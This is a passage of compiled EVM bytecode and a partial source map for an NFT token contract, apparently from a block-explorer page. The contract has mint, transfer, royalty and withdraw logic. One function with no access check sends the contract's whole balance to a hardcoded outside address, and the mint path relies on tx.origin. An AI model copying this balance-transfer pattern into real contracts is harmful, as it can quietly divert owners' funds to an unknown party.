611b46565b60008484015250505050565b6000601f19601f8301169050919050565b6000611b8982611b27565b611b938185611b32565b9350611ba3818560208601611b43565b611bac81611b6d565b840191505092915050565b60006020820190508181036000830152611bd18184611b7e565b905092915050565b6000819050919050565b611bec81611bd9565b8114611bf757600080fd5b50565b600081359050611c0981611be3565b92915050565b600060208284031215611c2557611c24611a62565b5b6000611c3384828501611bfa565b91505092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000611c6782611c3c565b9050919050565b611c7781611c5c565b82525050565b6000602082019050611c926000830184611c6e565b92915050565b611ca181611c5c565b8114611cac57600080fd5b50565b600081359050611cbe81611c98565b92915050565b60008060408385031215611cdb57611cda611a62565b5b6000611ce985828601611caf565b9250506020611cfa85828601611bfa565b9150509250929050565b611d0d81611bd9565b82525050565b6000602082019050611d286000830184611d04565b92915050565b60008060408385031215611d4557611d44611a62565b5b6000611d5385828601611bfa565b9250506020611d6485828601611bfa565b9150509250929050565b600080600060608486031215611d8757611d86611a62565b5b6000611d9586828701611caf565b9350506020611da686828701611caf565b9250506040611db786828701611bfa565b9150509250925092565b6000604082019050611dd66000830185611c6e565b611de36020830184611d04565b9392505050565b60008060408385031215611e0157611e00611a62565b5b6000611e0f85828601611caf565b9250506020611e2085828601611caf565b9150509250929050565b600060208284031215611e4057611e3f611a62565b5b6000611e4e84828501611caf565b91505092915050565b600080fd5b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b611e9982611b6d565b810181811067ffffffffffffffff82111715611eb857611eb7611e61565b5b80604052505050565b6000611ecb611a58565b9050611ed78282611e90565b919050565b600067ffffffffffffffff821115611ef757611ef6611e61565b5b611f0082611b6d565b9050602081019050919050565b82818337600083830152505050565b6000611f2f611f2a84611edc565b611ec1565b905082815260208101848484011115611f4b57611f4a611e5c565b5b611f56848285611f0d565b509392505050565b600082601f830112611f7357611f72611e57565b5b8135611f83848260208601611f1c565b91505092915050565b600060208284031215611fa257611fa1611a62565b5b600082013567ffffffffffffffff811115611fc057611fbf611a67565b5b611fcc84828501611f5e565b91505092915050565b611fde81611af1565b8114611fe957600080fd5b50565b600081359050611ffb81611fd5565b92915050565b6000806040838503121561201857612017611a62565b5b600061202685828601611caf565b925050602061203785828601611fec565b9150509250929050565b600067ffffffffffffffff82111561205c5761205b611e61565b5b61206582611b6d565b9050602081019050919050565b600061208561208084612041565b611ec1565b9050828152602081018484840111156120a1576120a0611e5c565b5b6120ac848285611f0d565b509392505050565b600082601f8301126120c9576120c8611e57565b5b81356120d9848260208601612072565b91505092915050565b600080600080608085870312156120fc576120fb611a62565b5b600061210a87828801611caf565b945050602061211b87828801611caf565b935050604061212c87828801611bfa565b925050606085013567ffffffffffffffff81111561214d5761214c611a67565b5b612159878288016120b4565b91505092959194509250565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806121ac57607f821691505b6020821081036121bf576121be612165565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006121ff82611bd9565b915061220a83611bd9565b925082820261221881611bd9565b9150828204841483151761222f5761222e6121c5565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600061227082611bd9565b915061227b83611bd9565b92508261228b5761228a612236565b5b828204905092915050565b60006122a182611bd9565b91506122ac83611bd9565b92508282019050808211156122c4576122c36121c5565b5b92915050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b60006008830261232c7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826122ef565b61233686836122ef565b95508019841693508086168417925050509392505050565b6000819050919050565b600061237361236e61236984611bd9565b61234e565b611bd9565b9050919050565b6000819050919050565b61238d83612358565b6123a16123998261237a565b8484546122fc565b825550505050565b600090565b6123b66123a9565b6123c1818484612384565b505050565b5b818110156123e5576123da6000826123ae565b6001810190506123c7565b5050565b601f82111561242a576123fb816122ca565b612404846122df565b81016020851015612413578190505b61242761241f856122df565b8301826123c6565b50505b505050565b600082821c905092915050565b600061244d6000198460080261242f565b1980831691505092915050565b6000612466838361243c565b9150826002028217905092915050565b61247f82611b27565b67ffffffffffffffff81111561249857612497611e61565b5b6124a28254612194565b6124ad8282856123e9565b600060209050601f8311600181146124e057600084156124ce578287015190505b6124d8858261245a565b865550612540565b601f1984166124ee866122ca565b60005b82811015612516578489015182556001820191506020850194506020810190506124f1565b86831015612533578489015161252f601f89168261243c565b8355505b6001600288020188555050505b505050505050565b600061255382611bd9565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203612585576125846121c5565b5b600182019050919050565b600081905092915050565b600081546125a881612194565b6125b28186612590565b945060018216600081146125cd57600181146125e257612615565b60ff1983168652811515820286019350612615565b6125eb856122ca565b60005b8381101561260d578154818901526001820191506020810190506125ee565b838801955050505b50505092915050565b600061262982611b27565b6126338185612590565b9350612643818560208601611b43565b80840191505092915050565b7f2e6a736f6e000000000000000000000000000000000000000000000000000000600082015250565b6000612685600583612590565b91506126908261264f565b600582019050919050565b60006126a7828561259b565b91506126b3828461261e565b91506126be82612678565b91508190509392505050565b60006126d582611bd9565b91506126e083611bd9565b92508282039050818111156126f8576126f76121c5565b5b92915050565b600081519050919050565b600082825260208201905092915050565b6000612725826126fe565b61272f8185612709565b935061273f818560208601611b43565b61274881611b6d565b840191505092915050565b60006080820190506127686000830187611c6e565b6127756020830186611c6e565b6127826040830185611d04565b8181036060830152612794818461271a565b905095945050505050565b6000815190506127ae81611a98565b92915050565b6000602082840312156127ca576127c9611a62565b5b60006127d88482850161279f565b9150509291505056fea26469706673582212207faca917191e72b1b3e2c76f48aa3607d2b6a4ae44b236997e648de342e5c40464736f6c63430008120033697066733a2f2f626166796265696332756b656d33627275616d6f6e343277796d6d3276623436777134786c6437697772747a623332356e366566666a76637968652f

Deployed Bytecode

0x6080604052600436106101665760003560e01c80636352211e116100d1578063a035b1fe1161008a578063b88d4fde11610064578063b88d4fde146104f3578063c87b56dd1461050f578063d5abeb011461054c578063e985e9c51461057757610166565b8063a035b1fe14610483578063a0712d68146104ae578063a22cb465146104ca57610166565b80636352211e1461035f57806370a082311461039c5780637f942b5f146103d95780638da5cb5b1461040457806395d89b411461042f5780639b642de11461045a57610166565b806323b872dd1161012357806323b872dd146102805780632a55205a1461029c5780633a233f89146102da5780633ccfd60b1461030357806342842e0e1461031a578063627804af1461033657610166565b806301ffc9a71461016b57806306fdde03146101a8578063081812fc146101d3578063095ea7b31461021057806318160ddd1461022c5780631e34c58514610257575b600080fd5b34801561017757600080fd5b50610192600480360381019061018d9190611ac4565b6105b4565b60405161019f9190611b0c565b60405180910390f35b3480156101b457600080fd5b506101bd610646565b6040516101ca9190611bb7565b60405180910390f35b3480156101df57600080fd5b506101fa60048036038101906101f59190611c0f565b6106d8565b6040516102079190611c7d565b60405180910390f35b61022a60048036038101906102259190611cc4565b610757565b005b34801561023857600080fd5b5061024161089b565b60405161024e9190611d13565b60405180910390f35b34801561026357600080fd5b5061027e60048036038101906102799190611d2e565b6108b2565b005b61029a60048036038101906102959190611d6e565b61091e565b005b3480156102a857600080fd5b506102c360048036038101906102be9190611d2e565b610c40565b6040516102d1929190611dc1565b60405180910390f35b3480156102e657600080fd5b5061030160048036038101906102fc9190611dea565b610c91565b005b34801561030f57600080fd5b50610318610cfa565b005b610334600480360381019061032f9190611d6e565b610d9d565b005b34801561034257600080fd5b5061035d60048036038101906103589190611cc4565b610dbd565b005b34801561036b57600080fd5b5061038660048036038101906103819190611c0f565b610e46565b6040516103939190611c7d565b60405180910390f35b3480156103a857600080fd5b506103c360048036038101906103be9190611e2a565b610e58565b6040516103d09190611d13565b60405180910390f35b3480156103e557600080fd5b506103ee610f10565b6040516103fb9190611d13565b60405180910390f35b34801561041057600080fd5b50610419610f16565b6040516104269190611c7d565b60405180910390f35b34801561043b57600080fd5b50610444610f3c565b6040516104519190611bb7565b60405180910390f35b34801561046657600080fd5b50610481600480360381019061047c9190611f8c565b610fce565b005b34801561048f57600080fd5b5061049861103b565b6040516104a59190611d13565b60405180910390f35b6104c860048036038101906104c39190611c0f565b611041565b005b3480156104d657600080fd5b506104f160048036038101906104ec9190612001565b6111b3565b005b61050d600480360381019061050891906120e2565b6112be565b005b34801561051b57600080fd5b5061053660048036038101906105319190611c0f565b611331565b6040516105439190611bb7565b60405180910390f35b34801561055857600080fd5b50610561611365565b60405161056e9190611d13565b60405180910390f35b34801561058357600080fd5b5061059e60048036038101906105999190611dea565b61136b565b6040516105ab9190611b0c565b60405180910390f35b60006301ffc9a760e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916148061060f57506380ac58cd60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b8061063f5750635b5e139f60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b9050919050565b60606002805461065590612194565b80601f016020809104026020016040519081016040528092919081815260200182805461068190612194565b80156106ce5780601f106106a3576101008083540402835291602001916106ce565b820191906000526020600020905b8154815290600101906020018083116106b157829003601f168201915b5050505050905090565b60006106e3826113ff565b610719576040517fcf4700e400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6006600083815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b600061076282610e46565b90508073ffffffffffffffffffffffffffffffffffffffff1661078361145e565b73ffffffffffffffffffffffffffffffffffffffff16146107e6576107af816107aa61145e565b61136b565b6107e5576040517fcfb3b94200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b826006600084815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b60006108a5611466565b6001546000540303905090565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461090c57600080fd5b81600a81905550806009819055505050565b60006109298261146b565b90508373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614610990576040517fa114810000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b60008061099c84611537565b915091506109b281876109ad61145e565b61155e565b6109fe576109c7866109c261145e565b61136b565b6109fd576040517f59c896be00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b600073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1603610a64576040517fea553b3400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b610a7186868660016115a2565b8015610a7c57600082555b600560008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600081546001900391905081905550600560008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000815460010191905081905550610b4a85610b268888876115a8565b7c0200000000000000000000000000000000000000000000000000000000176115d0565b600460008681526020019081526020016000208190555060007c0200000000000000000000000000000000000000000000000000000000841603610bd05760006001850190506000600460008381526020019081526020016000205403610bce576000548114610bcd578360046000838152602001908152602001600020819055505b5b505b838573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a4610c3886868660016115fb565b505050505050565b60008060006103e8603285610c5591906121f4565b610c5f9190612265565b9050600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff168192509250509250929050565b6000471115610cf657739c38cbea2384a9991ad4ac929e3f5d707ae2156773ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610cf4573d6000803e3d6000fd5b505b5050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610d5457600080fd5b3373ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610d9a573d6000803e3d6000fd5b50565b610db8838383604051806020016040528060008152506112be565b505050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610e1757600080fd5b60095481610e2361089b565b610e2d9190612296565b1115610e3857600080fd5b610e428282611601565b5050565b6000610e518261146b565b9050919050565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610ebf576040517f8f4eb60400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b67ffffffffffffffff600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054169050919050565b600a5481565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b606060038054610f4b90612194565b80601f0160208091040260200160405190810160405280929190818152602001828054610f7790612194565b8015610fc45780601f10610f9957610100808354040283529160200191610fc4565b820191906000526020600020905b815481529060010190602001808311610fa757829003601f168201915b5050505050905090565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461102857600080fd5b80600e90816110379190612476565b5050565b600b5481565b8060003403611169576001811461105757600080fd5b60056009546110669190612265565b61106e61089b565b11156111645761107c61161f565b600d6000438152602001908152602001600020541080156110dc57506001600c60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054105b6110e557600080fd5b600c60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600081548092919061113590612548565b9190505550600d6000438152602001908152602001600020600081548092919061115e90612548565b91905055505b611184565b600b548161117791906121f4565b34101561118357600080fd5b5b6009548261119061089b565b61119a9190612296565b11156111a557600080fd5b6111af3383611601565b5050565b80600760006111c061145e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff1661126d61145e565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c31836040516112b29190611b0c565b60405180910390a35050565b6112c984848461091e565b60008373ffffffffffffffffffffffffffffffffffffffff163b1461132b576112f484848484611647565b61132a576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b50505050565b6060600e61133e83611797565b60405160200161134f92919061269b565b6040516020818303038152906040529050919050565b60095481565b6000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b60008161140a611466565b11158015611419575060005482105b8015611457575060007c0100000000000000000000000000000000000000000000000000000000600460008581526020019081526020016000205416145b9050919050565b600033905090565b600090565b6000808290508061147a611466565b11611500576000548110156114ff5760006004600083815260200190815260200160002054905060007c01000000000000000000000000000000000000000000000000000000008216036114fd575b600081036114f35760046000836001900393508381526020019081526020016000205490506114c9565b8092505050611532565b505b5b6040517fdf2d9b4200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b919050565b60008060006006600085815260200190815260200160002090508092508254915050915091565b600073ffffffffffffffffffffffffffffffffffffffff8316925073ffffffffffffffffffffffffffffffffffffffff821691508382148383141790509392505050565b50505050565b60008060e883901c905060e86115bf8686846117e7565b62ffffff16901b9150509392505050565b600073ffffffffffffffffffffffffffffffffffffffff83169250814260a01b178317905092915050565b50505050565b61161b8282604051806020016040528060008152506117f0565b5050565b6000600c61162b61089b565b60095461163891906126ca565b6116429190612265565b905090565b60008373ffffffffffffffffffffffffffffffffffffffff1663150b7a0261166d61145e565b8786866040518563ffffffff1660e01b815260040161168f9493929190612753565b6020604051808303816000875af19250505080156116cb57506040513d601f19601f820116820180604052508101906116c891906127b4565b60015b611744573d80600081146116fb576040519150601f19603f3d011682016040523d82523d6000602084013e611700565b606091505b50600081510361173c576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b805181602001fd5b63150b7a0260e01b7bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916817bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614915050949350505050565b606060a060405101806040526020810391506000825281835b6001156117d257600184039350600a81066030018453600a81049050806117b0575b50828103602084039350808452505050919050565b60009392505050565b6117fa838361188d565b60008373ffffffffffffffffffffffffffffffffffffffff163b1461188857600080549050600083820390505b61183a6000868380600101945086611647565b611870576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b81811061182757816000541461188557600080fd5b50505b505050565b600080549050600082036118cd576040517fb562e8dd00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6118da60008483856115a2565b600160406001901b178202600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055506119518361194260008660006115a8565b61194b85611a48565b176115d0565b6004600083815260200190815260200160002081905550600080838301905073ffffffffffffffffffffffffffffffffffffffff85169150828260007fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600080a4600183015b8181146119f257808360007fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600080a46001810190506119b7565b5060008203611a2d576040517f2e07630000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b806000819055505050611a4360008483856115fb565b505050565b60006001821460e11b9050919050565b6000604051905090565b600080fd5b600080fd5b60007fffffffff0000000000000000000000000000000000000000000000000000000082169050919050565b611aa181611a6c565b8114611aac57600080fd5b50565b600081359050611abe81611a98565b92915050565b600060208284031215611ada57611ad9611a62565b5b6000611ae884828501611aaf565b91505092915050565b60008115159050919050565b611b0681611af1565b82525050565b6000602082019050611b216000830184611afd565b92915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611b61578082015181840152602081019050611b46565b60008484015250505050565b6000601f19601f8301169050919050565b6000611b8982611b27565b611b938185611b32565b9350611ba3818560208601611b43565b611bac81611b6d565b840191505092915050565b60006020820190508181036000830152611bd18184611b7e565b905092915050565b6000819050919050565b611bec81611bd9565b8114611bf757600080fd5b50565b600081359050611c0981611be3565b92915050565b600060208284031215611c2557611c24611a62565b5b6000611c3384828501611bfa565b91505092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000611c6782611c3c565b9050919050565b611c7781611c5c565b82525050565b6000602082019050611c926000830184611c6e565b92915050565b611ca181611c5c565b8114611cac57600080fd5b50565b600081359050611cbe81611c98565b92915050565b60008060408385031215611cdb57611cda611a62565b5b6000611ce985828601611caf565b9250506020611cfa85828601611bfa565b9150509250929050565b611d0d81611bd9565b82525050565b6000602082019050611d286000830184611d04565b92915050565b60008060408385031215611d4557611d44611a62565b5b6000611d5385828601611bfa565b9250506020611d6485828601611bfa565b9150509250929050565b600080600060608486031215611d8757611d86611a62565b5b6000611d9586828701611caf565b9350506020611da686828701611caf565b9250506040611db786828701611bfa565b9150509250925092565b6000604082019050611dd66000830185611c6e565b611de36020830184611d04565b9392505050565b60008060408385031215611e0157611e00611a62565b5b6000611e0f85828601611caf565b9250506020611e2085828601611caf565b9150509250929050565b600060208284031215611e4057611e3f611a62565b5b6000611e4e84828501611caf565b91505092915050565b600080fd5b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b611e9982611b6d565b810181811067ffffffffffffffff82111715611eb857611eb7611e61565b5b80604052505050565b6000611ecb611a58565b9050611ed78282611e90565b919050565b600067ffffffffffffffff821115611ef757611ef6611e61565b5b611f0082611b6d565b9050602081019050919050565b82818337600083830152505050565b6000611f2f611f2a84611edc565b611ec1565b905082815260208101848484011115611f4b57611f4a611e5c565b5b611f56848285611f0d565b509392505050565b600082601f830112611f7357611f72611e57565b5b8135611f83848260208601611f1c565b91505092915050565b600060208284031215611fa257611fa1611a62565b5b600082013567ffffffffffffffff811115611fc057611fbf611a67565b5b611fcc84828501611f5e565b91505092915050565b611fde81611af1565b8114611fe957600080fd5b50565b600081359050611ffb81611fd5565b92915050565b6000806040838503121561201857612017611a62565b5b600061202685828601611caf565b925050602061203785828601611fec565b9150509250929050565b600067ffffffffffffffff82111561205c5761205b611e61565b5b61206582611b6d565b9050602081019050919050565b600061208561208084612041565b611ec1565b9050828152602081018484840111156120a1576120a0611e5c565b5b6120ac848285611f0d565b509392505050565b600082601f8301126120c9576120c8611e57565b5b81356120d9848260208601612072565b91505092915050565b600080600080608085870312156120fc576120fb611a62565b5b600061210a87828801611caf565b945050602061211b87828801611caf565b935050604061212c87828801611bfa565b925050606085013567ffffffffffffffff81111561214d5761214c611a67565b5b612159878288016120b4565b91505092959194509250565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806121ac57607f821691505b6020821081036121bf576121be612165565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006121ff82611bd9565b915061220a83611bd9565b925082820261221881611bd9565b9150828204841483151761222f5761222e6121c5565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600061227082611bd9565b915061227b83611bd9565b92508261228b5761228a612236565b5b828204905092915050565b60006122a182611bd9565b91506122ac83611bd9565b92508282019050808211156122c4576122c36121c5565b5b92915050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b60006008830261232c7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826122ef565b61233686836122ef565b95508019841693508086168417925050509392505050565b6000819050919050565b600061237361236e61236984611bd9565b61234e565b611bd9565b9050919050565b6000819050919050565b61238d83612358565b6123a16123998261237a565b8484546122fc565b825550505050565b600090565b6123b66123a9565b6123c1818484612384565b505050565b5b818110156123e5576123da6000826123ae565b6001810190506123c7565b5050565b601f82111561242a576123fb816122ca565b612404846122df565b81016020851015612413578190505b61242761241f856122df565b8301826123c6565b50505b505050565b600082821c905092915050565b600061244d6000198460080261242f565b1980831691505092915050565b6000612466838361243c565b9150826002028217905092915050565b61247f82611b27565b67ffffffffffffffff81111561249857612497611e61565b5b6124a28254612194565b6124ad8282856123e9565b600060209050601f8311600181146124e057600084156124ce578287015190505b6124d8858261245a565b865550612540565b601f1984166124ee866122ca565b60005b82811015612516578489015182556001820191506020850194506020810190506124f1565b86831015612533578489015161252f601f89168261243c565b8355505b6001600288020188555050505b505050505050565b600061255382611bd9565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203612585576125846121c5565b5b600182019050919050565b600081905092915050565b600081546125a881612194565b6125b28186612590565b945060018216600081146125cd57600181146125e257612615565b60ff1983168652811515820286019350612615565b6125eb856122ca565b60005b8381101561260d578154818901526001820191506020810190506125ee565b838801955050505b50505092915050565b600061262982611b27565b6126338185612590565b9350612643818560208601611b43565b80840191505092915050565b7f2e6a736f6e000000000000000000000000000000000000000000000000000000600082015250565b6000612685600583612590565b91506126908261264f565b600582019050919050565b60006126a7828561259b565b91506126b3828461261e565b91506126be82612678565b91508190509392505050565b60006126d582611bd9565b91506126e083611bd9565b92508282039050818111156126f8576126f76121c5565b5b92915050565b600081519050919050565b600082825260208201905092915050565b6000612725826126fe565b61272f8185612709565b935061273f818560208601611b43565b61274881611b6d565b840191505092915050565b60006080820190506127686000830187611c6e565b6127756020830186611c6e565b6127826040830185611d04565b8181036060830152612794818461271a565b905095945050505050565b6000815190506127ae81611a98565b92915050565b6000602082840312156127ca576127c9611a62565b5b60006127d88482850161279f565b9150509291505056fea26469706673582212207faca917191e72b1b3e2c76f48aa3607d2b6a4ae44b236997e648de342e5c40464736f6c63430008120033

Deployed Bytecode Sourcemap

51972:2239:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;18679:639;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;19581:100;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;26072:218;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;25505:408;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;15332:323;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;53646:113;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;29711:2827;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;53878:213;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;;:::i;:::-;;;;;;;;33840:244;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;54099:109;;;;;;;;;;;;;:::i;:::-;;32634:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;52926:161;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;20974:152;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16516:233;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;52084:26;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;52016:20;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;19757:104;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;53202:84;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;52119:34;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;52275:163;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;26630:234;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;33427:407;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;53474:164;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;52045:30;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;27021:164;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;18679:639;18764:4;19103:10;19088:25;;:11;:25;;;;:102;;;;19180:10;19165:25;;:11;:25;;;;19088:102;:179;;;;19257:10;19242:25;;:11;:25;;;;19088:179;19068:199;;18679:639;;;:::o;19581:100::-;19635:13;19668:5;19661:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;19581:100;:::o;26072:218::-;26148:7;26173:16;26181:7;26173;:16::i;:::-;26168:64;;26198:34;;;;;;;;;;;;;;26168:64;26252:15;:24;26268:7;26252:24;;;;;;;;;;;:30;;;;;;;;;;;;26245:37;;26072:218;;;:::o;25505:408::-;25594:13;25610:16;25618:7;25610;:16::i;:::-;25594:32;;25666:5;25643:28;;:19;:17;:19::i;:::-;:28;;;25639:175;;25691:44;25708:5;25715:19;:17;:19::i;:::-;25691:16;:44::i;:::-;25686:128;;25763:35;;;;;;;;;;;;;;25686:128;25639:175;25859:2;25826:15;:24;25842:7;25826:24;;;;;;;;;;;:30;;;:35;;;;;;;;;;;;;;;;;;25897:7;25893:2;25877:28;;25886:5;25877:28;;;;;;;;;;;;25583:330;25505:408;;:::o;15332:323::-;15393:7;15621:15;:13;:15::i;:::-;15606:12;;15590:13;;:28;:46;15583:53;;15332:323;:::o;53646:113::-;53146:10;53137:19;;:5;;;;;;;;;;;:19;;;53129:28;;;;;;53726:1:::1;53716:7;:11;;;;53750:1;53738:9;:13;;;;53646:113:::0;;:::o;29711:2827::-;29855:27;29885;29904:7;29885:18;:27::i;:::-;29855:57;;29970:4;29929:45;;29945:19;29929:45;;;29925:86;;29983:28;;;;;;;;;;;;;;29925:86;30025:27;30054:23;30081:35;30108:7;30081:26;:35::i;:::-;30024:92;;;;30216:68;30241:15;30258:4;30264:19;:17;:19::i;:::-;30216:24;:68::i;:::-;30211:180;;30304:43;30321:4;30327:19;:17;:19::i;:::-;30304:16;:43::i;:::-;30299:92;;30356:35;;;;;;;;;;;;;;30299:92;30211:180;30422:1;30408:16;;:2;:16;;;30404:52;;30433:23;;;;;;;;;;;;;;30404:52;30469:43;30491:4;30497:2;30501:7;30510:1;30469:21;:43::i;:::-;30605:15;30602:160;;;30745:1;30724:19;30717:30;30602:160;31142:18;:24;31161:4;31142:24;;;;;;;;;;;;;;;;31140:26;;;;;;;;;;;;31211:18;:22;31230:2;31211:22;;;;;;;;;;;;;;;;31209:24;;;;;;;;;;;31533:146;31570:2;31619:45;31634:4;31640:2;31644:19;31619:14;:45::i;:::-;11731:8;31591:73;31533:18;:146::i;:::-;31504:17;:26;31522:7;31504:26;;;;;;;;;;;:175;;;;31850:1;11731:8;31799:19;:47;:52;31795:627;;31872:19;31904:1;31894:7;:11;31872:33;;32061:1;32027:17;:30;32045:11;